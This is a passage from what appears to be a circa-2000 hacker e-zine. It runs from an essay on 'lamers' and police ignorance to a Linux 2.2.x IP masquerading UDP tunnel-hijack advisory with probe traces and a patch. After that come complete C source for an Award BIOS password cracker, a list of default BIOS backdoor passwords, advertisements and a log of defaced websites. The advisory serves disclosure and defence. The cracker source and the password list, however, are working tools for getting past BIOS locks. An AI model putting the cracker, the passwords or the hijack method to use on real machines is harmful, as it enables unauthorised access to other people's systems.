people while they were connected to the internet. Harris also had a site,
which offered pornographic pictures, pirate-programs and files of every
kind, and whenever someone connected to his address, they were immediately
infected by the computer virus.
[...]
In a few words, lieutenant Spoto succeeds in showing his complete
ignorance of the subject: he gives an abominable definition of ICQ,
defines Netbus as a virus rather than a trojan (which means he doesn't
have any idea of how it works), and still not being satisfied with this,
attributes it with a contagiousness similar to the Ebola virus: to be
infected simply by connecting to an Internet address sounds like
something supernatural. Then, he shamelessy concludes with the invitation
"If anyone has had contact with Harris, and thinks that their files may
have been forced, they can come to us at the Police Station". If everyone
at the Police Station are as experienced as he is, it would be preferable
to keep the Harris' "virus" rather than allowing them to put their hands
anywhere near your computer.
Besides, these self-acclaimed hackers are almost never bust because of a
police operation, (unless they caused a lot of trouble), but because they
have the stupid habit of boasting of their actions in chatrooms or even
in real life. Often in front of total strangers, that are often police
officers or people close to the law enforcement environment, (such as the
child or the girlfriend of a police officer). In fact, the conclusive
part of the article regarding "Harris" says: "The investigators did not
explain how, but only that they had succeeded in identifying the
surveyor": obviously the law officers would like people to think that
they identified the guilty person by means of some complicated technique,
pursuing the information packets or something in this line, rather than
admitting that they only had to make a few enquiries on IRC channels.
The hacker is the one that develops the exploit, and eventually creates a
program based on this expoit. People that blindly use these programs
because they found them on the Internet, or even worse, because a friend
passed them on to them, are merely lamers, that only have a vague idea of
how to use the tool they have in their hands and they know nothing about
computer systems, programming, or how to cover their tracks. Often these
self-acclaimed hackers, self infect themselves with a virus or a trojan
they just downloaded, due to their incapabilities. Putting these programs
in the hands of the average person is like giving a loaded gun to a five
year-old.
The fact is, that up to the early '80s, computers were only intended for
hackers, specialized personnel or students. Only later did they appear on
the desks of offices and in houses. The first home computers replaced the
primitive consoles of videogames like the Atari 2600, the Intellivision
and the Colecovision (the revolution was lead by the Commodore 64 and the
Sinclair ZX Spectrum), but still across the whole world there was a
"computer culture" throughout the '80s, there were published magazines
that taught programming (mainly BASIC, as well as Machine Code) and very
advanced techniques worthy of the best hackers. Then during the '90s,
Apple and Microsoft's dream started to come true, "a computer on every
desk and in every home". The computer became a common appliance available
to almost everybody, the general level of the magazines started to drop,
and almost all were confined to publishing articles about the latest
hardware and software, or advice on how to use commercial applications.
This change in the computer world that made computers not only the sole
domain of the hackers, but for everyone, has certainly had some positive
general effects, but it proved to be a double edged sword, especially
with the advent of the Internet. These days anyone can have powerful
tools that inflict damage on other people, real "digital weapons",
without having a clue about how they work or how they should be
"handled". The average guy can get locked up just for perpetrating what
he thought was a "cool" joke, even if it was in bad taste.
All those lamers-wannabe-hackers should better satisfy their needs with
APEX v1.00 r10/8/91, a nice program written by Ed T. Toton III (however
the original idea is older) that simulates the connection to different US
government and military computers (like those of NORAD, or of NASA),
among other things it is also possible to pretend that you are the
President of the United States of America, and enter the system that
controls the nuclear weapons. With a bit of ability and practice, it is
possible to convince some friends that you are really trying to force the
US computer systems, and pass the time having good clean fun, without
hurting anybody, risking a jail sentence and/or offending the hackers by
trying to pretend to be what you are not.
But besides this, outside of the "criminal" context, something that
bothers hackers is the ever increasing mass of self-claimed computer
"experts", that actually don't know much more than how to turn on a
computer and launch a program, and they fill their mouthes with loads of
technical words about which they know nothing. At this point, it is very
interesting to read this text from the already quoted home page of the
KIN:
I remember [...] When writing software was closer to art and magic
than to business and/or just coding. I miss that now. What happened
after that? Well, tons of fast graduates appeared who could only do
Basic or Clipper/DBase programming, who pretended to be the best.
They could wear suites and had money and relatives... I called them
nephews. How many times were you in the situation when you gave the
best offer, and you simply feel you HAD to write this software - but
in the end your client says something like: "I'm really sorry, but I
just got a call from my wife and her nephew works for this company
in Nebraska who are certified Basic engineers so we'll have to give
the contract to them?" The nephews produced terrible software which
led to terrible disappointments in the industry ('I've invested so
much money in computers and it's not really working for me').
[...] The Net gives you a chance to be first creative and then think
about business. Let's use it now - before nephews will get their
certified degrees....
Sadly, a crowd of nephews are already working, with or without certified
degrees, and armed with programs like Front Page or Publisher creating
websites, filling their big mouths with words like FTP and client-server
application, even if they don't know what they mean or what they are
talking about. Luckily, the Net is large and, - at least for the moment,
- it generates its own rules by itself. There is room for everyone.
@HWA
264.0 Linux 2.2.x masq tunnel/hijack scenerio
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
COMMAND
kernel (IP Masquerading)
SYSTEMS AFFECTED
Linux 2.2.x
PROBLEM
H D Moore found following. Due to lax checking in the
masquerading kernel code, an attacker is able to rewrite a linux
masq gateway's UDP masquerading entries so that the remote host
and port are whatever they choose. This creates a tunnel between
whatever host and port they want and a UDP port on an inside
machine. The attacker is unable to tell what local inside ports
and addresses are being used, but they can determine the number
of currently masqueraded connections and the number of different
hosts using those connections behind the firewall. Any network
where UDP traffic is masqueraded to the outside is vulnerable to
this, including DNS, TFTP, NetBIOS, and a multitude of other
applications which rely on UDP transport. Since UDP is a
connectionless protocol, the only way to determine that a
masqueraded connection is no longer being used is by timing it
out due to lack of activity or receiving ICMP messages indication
the port is closed. The result is that there is a 5 minute
time-out by default for all masqueraded UDP sessions, allowing an
attacker enough time to find and exploit the connection with some
of the methods outlined in the Examples section below.
For those familiar with the linux masquerading system, please
jump to the next paragraph. IP masquerading is an implementation
of NAT (Network Address Translation) for the linux OS. It allows
you to connect an internal network using private addresses to an
external network (internet) in a fairly secure manner. All
packets coming from the internal network and destined for the
external network are rewritten so the source of those packets is
the masquerading gateway's external address and the source port
is the gateway's source port. This only requires one external IP
address to enable internet access for hundreds/thousands of
internal machines and is therefore a popular method for many
businesses and home users with broadband connections. The TCP
and UDP protocols require both source and destination ports as
well as source and destination addresses to work. The source
port for outgoing UDP/TCP connections is usually picked from the
first available port between 1024 and 65535 on the originating
host, so how does the masq gateway relay these connections AND be
able to use these protocols for its own networking? The kernel
sets aside the ports 61000 to 65096 by default for handling the
masqueaded connection entries, allowing for a theoretical maximum
of 4096 of both UDP and TCP connections at a time. These values
can be changed in the code or through the /proc file system. Now
when connection request from internal host A comes in from local
port 1035 and its destination is the external DNS server Host Z
on port 53, the masquerading machine adds a new entry to the
masquerading table that looks like this:
Host A:1035 (651001) -> Host Z:53
The port in paranthesis is the local port the gateway uses to
send the forwarded UDP datagrams from and the port it uses to
receive responses back from Host Z. The next paragraph describes
how the vulnerability found allows an attacker to modify the
right side of the above connection to allow traffic to come from
thier host back into the internal network to the local port on
the inside host.
The UDP masquerading code only checks the DESTINATION PORT to
determine if a packet coming from the external network is to be
forwarded inside. It then sets the remote HOST and PORT to the
source address and source port of the incoming packet. This is
due to a number of hosts/services returning UDP from an IP other
than that which the original UDP packet went to - for example it
is frequently the case that NFS servers just use the interface ip
address "closest" to that which the NFS op came from.
An attacker only needs to determine the local port on the masq
gateway to be able to rewrite the masq table with thier own
address and port, which is trivial considering the relatively
small port range set by default for use by masqueraded conenctions
(65100 - 65096). Now how do you determine which one of these
ports is the local port on the gateway for the masq connection?
Easy, we send a probe packet to each of these hosts and watch the
IP ID field in the responses. The IP ID field is sequentially
incremented on each host's TCP/IP stack for each packet they send
out, so the masq'd port ICMP response will have the IP ID of the
INTERNAL host, which is almost always at least 1000 away from the
current IP ID of the gateway machine. See the Examples section
below for packet traces of a complete scan/attack.
Examples. We know that example.com has a linux masquerading
gateway and that thier DNS server is outside of this firewall. We
can come to the conclusion that internal machines must be able to
contact the external DNS server to be able to access the
internet. We start sending our probe packets:
Host A is our internal workstation (192.168.1.100)
Host B is our masq gateway (192.168.1.1 / 10.0.0.1)
Host C is the DNS server (10.0.0.25)
Host X is the attacker (10.10.187.13)
ipchains -L -M -n on the masq gateway BEFORE the probes
> UDP 03:39.21 192.168.1.100 10.0.0.25 1035 (63767) -> 53
[ tcpdump from attacker's machine ]
( we picked source port 12345 for our packets just so the trace
would be easier to follow)
[ snip -- this starts at port 61000 ]
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos
0xd8] (ttl 245, id 13135)
10.10.187.13.12345 > 10.0.0.1.63763: udp 0 (DF) [tos 0x18] (ttl 254, id
23069)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos
0xd8] (ttl 245, id 13136)
10.10.187.13.12345 > 10.0.0.1.63764: udp 0 (DF) [tos 0x18] (ttl 254, id
23070)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos
0xd8] (ttl 245, id 13137)
10.10.187.13.12345 > 10.0.0.1.63765: udp 0 (DF) [tos 0x18] (ttl 254, id
23071)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos
0xd8] (ttl 245, id 13138)
10.10.187.13.12345 > 10.0.0.1.63766: udp 0 (DF) [tos 0x18] (ttl 254, id
23074)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos
0xd8] (ttl 245, id 13139)
10.10.187.13.12345 > 10.0.0.1.63767: udp 0 (DF) [tos 0x18] (ttl 254, id
23083)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63767 unreachable [tos
0xd8] (ttl 244, id 17205)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
The above packet's ID is substantially different, we may have
found a masq'd connection !!!
10.10.187.13.12345 > 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id
23084)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos
0xd8] (ttl 245, id 13140)
10.10.187.13.12345 > 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id
23088)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos
0xd8] (ttl 245, id 13141)
10.10.187.13.12345 > 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id
23090)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63770 unreachable [tos
0xd8] (ttl 245, id 13142)
10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id
23091)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos
0xd8] (ttl 245, id 13143)
10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id
23092)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos
0xd8] (ttl 245, id 13144)
[ snip -- all the way to the upper end of our masq ports ]
ipchains -L -M -n on the masq gateway AFTER the probes
> UDP 04:35.12 192.168.1.100 10.10.187.13 1035 (63767) -> 12345
^-------[ expiration of the udp tunnel has been updated ;)
We now have a working tunnel from our host to port 1035 on the
inside machine!
We have demonstrated that it is possible for us to 'hijack' the
enternal side of a masqueraded connection, so now what? There is
not a whole lot we can do to the closed local udp port on the
inside machine, so its time to examine other
applications/protocols that use UDP for transport and what
security risks there are in allowing unrestricted external access
to thier source ports. We leave this as an excercise to the
reader...
Following the "NetBIOS Info" thread on Incidents mailing list at
SF, Robert Graham mentioned a utility he wrote to automatically
respond to netbios port 137 name probes with a netbios name
lookup back to the originating host. He mentioned that it seems
to cut right through state-based firewalls and NAT systems
because the response probe looks like a response to the outgoing
probe. Assuming that a host on an inside network is sending out
these netbios name queries, an attacker could exploit the linux
2.2.x vulnerability and be able to query the netbios names of
internal machines. More info:
http://www.robertgraham.com/pubs/firewall-seen.html#netbios
SOLUTION
In general it is not advisable the use of UDP masq for a
firewalling gateway - since the only thing that people are
normally putting through the UDP side is DNS, you are much better
advised to put a decent caching name server on the gateway box
and block UDP through completely.
The core problem is precisely not being able to actually _know_
when internal box has closed the port. You can easily revert to
good"old" way (1 tunnel/pair) by commenting out
#define CONFIG_IP_MASQ_LOOSE_DEFAULT 1
at ip_masq.c:418 (stupid patch attached). This should drop
hijack'ing... Of course, if we change the default, some way to
enable it back perhaps on a per-application basis (ip_masq
module) MUST be done.
--- net/ipv4/ip_masq.c.dloose Thu Mar 30 14:51:06 2000
+++ net/ipv4/ip_masq.c Thu Mar 30 14:57:24 2000
@@ -415,7 +415,7 @@
/*
* By default enable dest loose semantics
*/
-#define CONFIG_IP_MASQ_LOOSE_DEFAULT 1
+/* #define CONFIG_IP_MASQ_LOOSE_DEFAULT 1 */
/*
The issues causing this DoS are apparently more complex than it
may appear according to the discussion in the Linux kernel mailing
list. There is a patch for the exploit in 2.2.15pre-16 and it is
a noteworthy amount of code.
@HWA
265.0 AWARD Bios password cracker .c source code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
/*
* NAME
*
* awardpw -- Award BIOS Password generator and hash calculator
*
* SYNOPSIS
*
* awardpw
* awardpw password1 [password2...]
* awardpw {-r | -s} [-t target] [-l length] [-i randseed]
*
* DESCRIPTION
*
* Without arguments, awardpw prints a usage message. Given a list
* of passwords, it calculates the Award BIOS hash for each
* password. Given option -r, it generates random, alphanumeric
* (digits and upper and lower case) passwords of the given length,
* matching the target hash. Given option -s, it generates the
* sequence of all printable passwords of given length and target
* hash.
*
* The default target is 0x1eaa, a common hash for the Award
* "override" password. The default length is 4.
*
* NOTES
*
* The "intended" override password for hash 0x1eaa was probably
* "AWARD_SW", though "j262", "Syxz", and others have been
* offered. Someone reported "aLLy" (hash 0x1ea9) working for
* later versions of the Award BIOS, where the old passwords didn't
* work. "AWARD_SV" has hash 0x1ea9, too.
*
* On my Award BIOS (f000:fff5 date "03/10/95"), the password
* checking code uses the word at f000:ec60 for the override hash.
* If you have an OEM version of Award that doesn't respond to the
* "usual" overrides, you might want to check that word to see if
* a different override hash is sitting there.
*
* Some combinations of arguments will generate plenty of
* passwords, some will generate none. For example, there are no
* 5-character plaintext passwords for the 0x1eaa hash, but
* 4-character and 6-character passwords are plentiful. This is
* just an artifact of the hashing algorithm used.
*
* AUTHOR
*
* Kevin Buhr <buhr@stat.wisc.edu>
*/
/*
* the hashing algorithm: accumulate characters in a 16-bit register
* with a 2-bit left rotate before each add.
*/
int
eval_pw(char *pw)
{
unsigned int accum = 0;
while (*pw) {
accum = (accum << 2) | (accum >> 14);
accum += *pw++;
accum &= 0xffff;
}
return accum & 0xffff;
}
void
rand_pw(int n, char *pw)
{
int i,j;
unsigned int r, r62;
for (i=0; i<2; ++i) {
r = rand();
for (j=0; j<4; ++j) {
r62 = r % 62;
*pw++ = r62 <= 10 ? r62 + '0'
: r62 <= 10+26 ? r62 - 10 + 'A'
: r62 - 10 - 26 + 'a';
if (--n <= 0) return;
r /= 62;
}
}
}
int
inc_pw(char *pw)
{
while (*pw == 126) {
*pw++ = ' ';
}
if (*pw) ++*pw;
return *pw;
}
char *argv0;
void
show_syntax()
{
fprintf(stderr,
"awardpw -- calculate Award BIOS password hashes\n"
" (by Kevin Buhr <buhr@stat.wisc.edu>)\n");
fprintf(stderr,
"syntax:\n"
"\t%s password1 [password2...]\n"
"\t%s {-r | -s} [-t target] [-l length] [-i randseed]\n",
argv0, argv0);
}
void
try_random(int n, unsigned int target)
{
char pw[9];
if (n==0 || n>8) n=8;
pw[n] = 0;
fprintf(stderr, "target = 0x%04x\n", target);
while(1) {
rand_pw(n,pw);
if (eval_pw(pw) == target) {
printf("%s\n",pw);
}
}
}
void
try_sequence(int n, unsigned int target)
{
char pw[] = " ";
if (n==0 || n>8) n=8;
pw[n] = 0;
fprintf(stderr, "target = 0x%04x\n", target);
do {
if (eval_pw(pw) == target) {
printf("%s\n",pw);
}
} while (inc_pw(pw));
}
int
main(int argc, char** argv)
{
int opt;
int length = 4, target = 0x1eaa, seed = 0;
enum { NONE, RANDOM, SEQUENCE } mode = NONE;
argv0 = (argv[0] ? argv[0] : "awardpw");
while((opt = getopt(argc, argv, "hrsl:t:i:")) != EOF) {
switch (opt) {
case 'h':
show_syntax();
break;
case 'l':
length = atoi(optarg);
break;
case 't':
target = strtol(optarg,NULL,0);
break;
case 'i':
seed = atoi(optarg);
break;
case 'r':
mode = RANDOM;
break;
case 's':
mode = SEQUENCE;
break;
default:
show_syntax();
exit(1);
}
}
srand(seed);
switch (mode) {
case RANDOM:
try_random(length, target);
break;
case SEQUENCE:
try_sequence(length, target);
break;
default:
if (!argv[optind]) {
show_syntax();
} else {
while(argv[optind]) {
printf("%s => %04x\n", argv[optind], eval_pw(argv[optind]));
++optind;
}
}
break;
}
return 0;
}
@HWA
266.0 Locked out? default BIOS/CMOS password list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GENERIC/pirate
~~~~~~~~~~~~~~
bios
setup
cmos
AWARD BIOS:
~~~~~~~~~~
589589
PINT
pint
AWARD_SW
j262
condo
j322
faada
AWARD_PW
GO
go
shift+s y x z
AMI BIOS:
~~~~~~~~~
AMI
AMI_SW
AMI!SW/
AMI?SW/
@HWA
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _ _ _
/\ | | | | (_) (_)
/ \ __| |_ _____ _ __| |_ _ ___ _ _ __ __ _
/ /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` |
/ ____ \ (_| |\ V / __/ | | |_| \__ \ | | | | (_| |
/_/ \_\__,_| \_/ \___|_| \__|_|___/_|_| |_|\__, |
__/ |
|___/
ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG
______________________________________________________________
French Hackers' Portal / Le Portail Des Lascars Francophones
Links and News of interest / Liens et news pour lascars. ;-)
--------------------------------------------------------------
->->->->->->->->-> http://lascars.cjb.net <-<-<-<-<-<-<-<-<-
______________________________________________________________
http://revenger.hypermart.net
��� ����� � � ������� �� � ������ ����� ���
� � � � � � � � � � � � � � �
� � � � � � � � � � � �� � � �
�� ��� � � ������� � � � � ��� ��
� � � � � � � � � � ��� � � �
� � � � � � � � � � � � � �
� � ����� � ������� � �� ��� ����� � � 's
T E X T Z F I L E HOMEPAGE
http://revenger.hypermart.net
Here you may find up to 340 text files for:
ANARCHY , HACKING , GUIDES , CRACKING , VIRUS , GENERAL , ELECTRONICS ,
UNIX , MAGAZINES , TOP SECRET , CARDING , U.F.O.s , LOCKPICKING , IRC ,
PHREAKING , BOOKS AND A-S FILES AVAILABLE!
http://revenger.hypermart.net
Visit Us Now !
.
.
............... .
: : . . . . . .
__:________ : : ___________ . . .
\ < /_____:___ : ( < __( :_______
) : )______:___\_ (___( : /
=====/________|_________/ < | : (________________(======
: (__________________) :wd!
. : : :
- / - w w w . h a c k u n l i m i t e d . c o m - / -
: . . . . . : :
. . . . . :...............:
.
.
**************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
**************************************************************************
+------------------------------------------------------------------------+
| SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+------------------------------------------------------------------------+
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * **
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
* *
* http://www.csoft.net/ *
* *
* One of our sponsors, visit them now *
* *
* * * * * * ** * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* 2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Not much this week, but this is worth a peek .. heh tnx multisync for
the url... - Ed
http://www.hardocp.com/news_images/2000/february_2000/bsod.jpg
@HWA
=-----------------------------------------------------------------------=
_ _
___(_) |_ ___ ___
/ __| | __/ _ Y __|
\__ \ | || __|__ \
|___/_|\__\___|___/
SITE.1
-=- Fun =-
http://www.howtoandroid.com/HowToBuildRobotHead.html
Just go look :) ... - Ed
-=- Hack/Security -=-
http://root66.nl.eu.org
{} (aka Frank)
Cool site!, check it out, complete with interactive 'shell' to the
root66 box...a must see. - Ed
http://users.javanet.com/~alden/indexa.html
phluid (phluid@mindless.com)
Just stumbled across this and what a sweet looking site, you have to
check it out just to dig the layout/graphics. Very nice, content? well
have a look around, but do check it out ... - Ed
http://www.securax.org/
(Belgium/Dutch)
Submitted by: Zoa_Chien
Nice site, well laid out but unfortunately for many of us its not in English
:( ... check it out all the same, news, exploits, latest file list from
packetstorm, HNN affiliate etc.. - Ed
-=- Telephony -=-
http://twpyhr.usuck.com .
Jenny
Very interesting site for the telephone enthusiast, has lots of rare and
entertaining recordings of phone system screwups and general messages/
announcements etc, worth checking out, also check out the answering
machine OGM collection :-) fun stuff. - Ed
-=- Employment/Skill testing -=-
http://www.brainbench.com/
Check out this site, test you sysadmin skills, even get certified online!
post your stats to an online database and give the url to potential
employers etc, lots of services ... a must see. - Ed
You can Send in submissions for this section too if you've found
(or RUN) a cool site...
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
___| _ \ |
| __| _` |\ \ / | | __| _ \ _` |
| | ( | ` < | | | __/ ( |
\____|_| \__,_| _/\_\\___/ _| \___|\__,_|
Note: The hacked site reports stay, especially wsith some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
check out http://www.attrition.org/mirror/attrition/groups.html to see who
you are up against. You can often gather intel from IRC as many of these
groups maintain a presence by having a channel with their group name as
the channel name, others aren't so obvious but do exist.
>Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
==========================================================================
* Info supplied by the attrition.org mailing list.
Cracked webpage archives (list from attrition)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/
http://www.hackernews.com/archive/crackarch.html
http://www.freespeech.org/resistance/
http://www.rewted.org/cracked/
http://www.403-security.org/
http://www.projectgamma.com/defaced/
http://www.net-security.org/
http://www.netrus.net/users/beard/pages/hacks/
http://212.205.141.128/grhack/html/default_hacking.html
http://194.226.45.195/hacked/hacked.html
http://alldas.de/crkidx1.htm
http://www.turkeynews.net/Hacked
http://www.flashback.se/hack/
http://www.dutchthreat.org/
http://www.onething.com/archive/
http://www.2600.com/hacked_pages/
http://hysteria.sk/hacked/
http://erazor.vrnet.gr/
Cracked sites listed oldest to most recent...does anyone read these? huh? do ya? heh.
Date OS Group/Person AMCK Site 2000
~~~~ ~~ ~~~~~~~~~~~~ ~~~~ ~~~~ ~~~~~~~~
[00.04.06] NT [TheHead] M Pana Real Estate (www.panarealestate.com)
[00.04.06] NT [ph33r the b33r] M PC Star (www.pcstar.com)
[00.04.05] NT [TheHead] M SparZone (www.sparzone.com)
[00.04.04] Lb [System33] M War Industries (www.warindustries.com)
[00.04.04] WT [#parse] #2 WebThreads Server (frank.catalyst.net)
[00.04.04] So [the saint] Jessica Faltot (www.jfaltot.com)
[00.04.04] BI [crazy bit] High Circles (www.highcircles.com)
[00.04.03] [protokol] Gulf Public Schools (www.gulf.k12.fl.us)
[00.04.03] NT [Sabugo] Transity 2000 (www.transity2k.org)
[00.04.03] MO [BL4H & Omega] Axon Technology Pty Ltd (www.axon.net)
[00.04.03] NT [TheHead] Support site for HomePage.com (support.homepage.com)
[00.04.02] NT [ ] Job UK (www.job.co.uk)
[00.04.02] NT [Omega] Hallsville Independent School District (www.hisd.com)
[00.04.02] Li [TankDS] Farm Equipment Manufacturers Association (www.farmequip.org)
[00.04.02] NT [ ] Center for Telecommunications Technology (www.brewtoncc.com)
[00.04.02] NT [ ] Alabama Technology Network (www.atn.org)
[00.04.02] NT [ph33r the b33r] Alayam Press (www.alayam.com)
[00.04.02] Li [ph33r the b33r] Australian Information Processing Centre (www.aipc.com.au)
[00.04.02] NT [Clientel] ActivMedia (www.activmedia.com)
[00.04.02] NT [Shadoze] University of Sydney (Agriculture Dept) (agnis.agric.usyd.edu.au)
[00.04.02] [ph33r the b33r] M Sea Silver (seasilver.threadnet.com)
[00.04.02] NT [TankDS] M ACDI/VOCA (www.acdivoca.org)
[00.04.01] BI [McM4nus] United Prairie (www.unitedprairie.com)
[00.04.01] NT [Clientel] Star Market Grocery Stores (www.starmkts.com)
[00.04.01] Lr [Pakistan HC] Shanghai Yellow Pages (www.shanghaiyellowpages.net)
[00.04.01] Lr [McM4nus] Museum Mania (www.museummania.com)
[00.04.01] Bf [TnC] Lugano Synergy Investment Group (www.lsynergy.com)
[00.04.01] NT [Sabugo] Hed Foundation (www.hedfoundation.org)
[00.04.01] NT [ph33r the b33r] Find SVP (www.findsvp.com)
[00.04.01] NT [Tranzer] Finansekonomerna (www.finansekonomerna.su.se)
[00.04.01] NT [d3th] Duxbury S.A. (www.duxbury.co.za)
[00.04.01] NT [ph33r the b33r] Developers Magazine (www.developersmagazine.com)
[00.04.01] NT [ ] Secretaria de Estado da Sa�de, Estado de Santa Catarina (ntses01.saude.sc.gov.br)
[00.04.01] So [Seekret Hampster] OT New Zealand (charon.ot.co.nz)
[00.04.01] NT [TankDS] M Pede Tudo (www.pedetudo.com)
Date OS Group/Person AMCK Site 2000
~~~~ ~~ ~~~~~~~~~~~~ ~~~~ ~~~~ ~~~~~~~~
[00.03.16] NT [Blazinweed] M Zzyzx Diet Too (www.zzyzxdiettoo.com)
[00.03.16] NT [nore] #2 Virginia Department of Criminal Justice Services (www.dcjs.state.va.us)
[00.03.15] 95 [mojo] United Medical and Dental Schools of Guy's and St Thomas' Hospitals (tempus.umds.ac.uk)
[00.03.14] BI [Perro Manson] M TeleColumbia (www.telecolombia.com)
[00.03.14] NT [hack.be] For Leaders Only (www.leaders.be)
[00.03.14] Lr [m0s] Indian VXL Instruments Limited (www.vxl.co.in)
[00.03.14] NT [wegro] United Arab Emirates Ministry of Finance and Industry (www.fedfin.gov.ae)
[00.03.14] NT [ka0x] Kuala Lumpur Department of Urban Transportation (www.jpbdbkl.gov.my)
[00.03.14] NT [inferno.br] Brazil Ministerio Publico Militar (www.mpm.gov.br)
[00.03.14] NT [j0x] #2 UNESCO's Intergovernmental Oceanographic Commission (www.ioc.unesco.org)
[00.03.14] So [GForce Pakistan] M World Company (worldcompany.com)
[00.03.14] NT [hack.be] Comptoire d'Escompte de Belgique s.a. (www.ceb.be)
[00.03.14] NT [ ] Physical Therapist (www.physical-therapist.com)
[00.03.13] NT [kione] Servicio Nacional de Sanidad y Calidad Agroalimentaria (senasa.mecon.gov.ar)
[00.03.13] NT [ka0x] Malaysian Treasury (treasury.gov.my)
[00.03.13] NT [hack.be] Belgium Centre National de Documentation Scientifique et Technique (www.stis.fgov.be)
[00.03.13] Li [Malice] Rotory Powered Freaks (www.wankel.net)
[00.03.13] Li [Casey and Binary] Prank.org (www.prank.org)
[00.03.13] NT [Artech] Music Lab Rehersal Center (www.musiclab.net)
[00.03.13] Li [h3xx0r] Matrix Pakistan (www.matrix.com.pk)
[00.03.13] NT [ ] Lavallette, New Jersey (www.lavallette.com)
[00.03.13] NT [hack.be] Musees Royaux des Beaux-Arts de Belgique (www.fine-arts-museum.be)
[00.03.13] NT [ ] Emergency Room (www.emergencyroom.com)
[00.03.13] Lb [Ch1pBr34k3R] Ellicit (www.ellicit.net)
[00.03.13] 2k [acidklown] The Church in Oklahoma City, Inc (www.churchinokc.org)
[00.03.13] NT [aresnations] Body Guard (www.bodygard.com)
[00.03.13] NT [hack.be] Belgische vereniging van Banken (www.abb-bvb.be)
[00.03.12] NT [j0x] National Capital Planning Commission (www.ncpc.gov)
[00.03.12] NT [Crime Boys] #2 National Training Center, Bureau of Land Management (ntc.blm.gov)
[00.03.12] NT [Cyber Fuckers] Royal Danish Embassy in Cairo, Egypt (www.danemb.org.eg)
[00.03.12] NT [rewted] Unity College (www.unity.edu)
[00.03.12] So [ ] Stanmore College (www.stanmore.ac.uk)
[00.03.12] Li [DURO and Haze] Rock Solid Internet (www.rsinternet.com)
[00.03.12] NT [ ] Northampton Community College (www.northampton.edu)
[00.03.12] NT [ ] Lander University (www.lander.edu)
[00 03.12] Lr [ ] Junior College del Ecuador (www.jcollege.edu)
[00.03.12] NT [ ] Guangzhou Book-selling Center Company (www.gzbookcenter.com)
[00.03.12] Lr [ ] GS Security (www.gs-security.com)
[00.03.12] NT [ ] Federa��o Catarinense de Municipios (www.fecam.org.br)
[00.03.12] NT [ ] Fat Free Living (www.fatfreeliving.com)
[00.03.12] NT [aresnations] Fat Cat Multimedia (www.fatcatmultimedia.com)
[00.03.12] Li [ ] University of Dundee Medical School (mesmis.medschool.dundee.ac.uk)
[00.03.12] NT [ka0x] Los Andes (losandes.com.ar)
[00.03.12] NT [Not Dead] Computer 2001 (computer2001.co.uk)
[00.03.11] NT [j0x] #2 Parliament of the Russian Federation (www.parliament.ru)
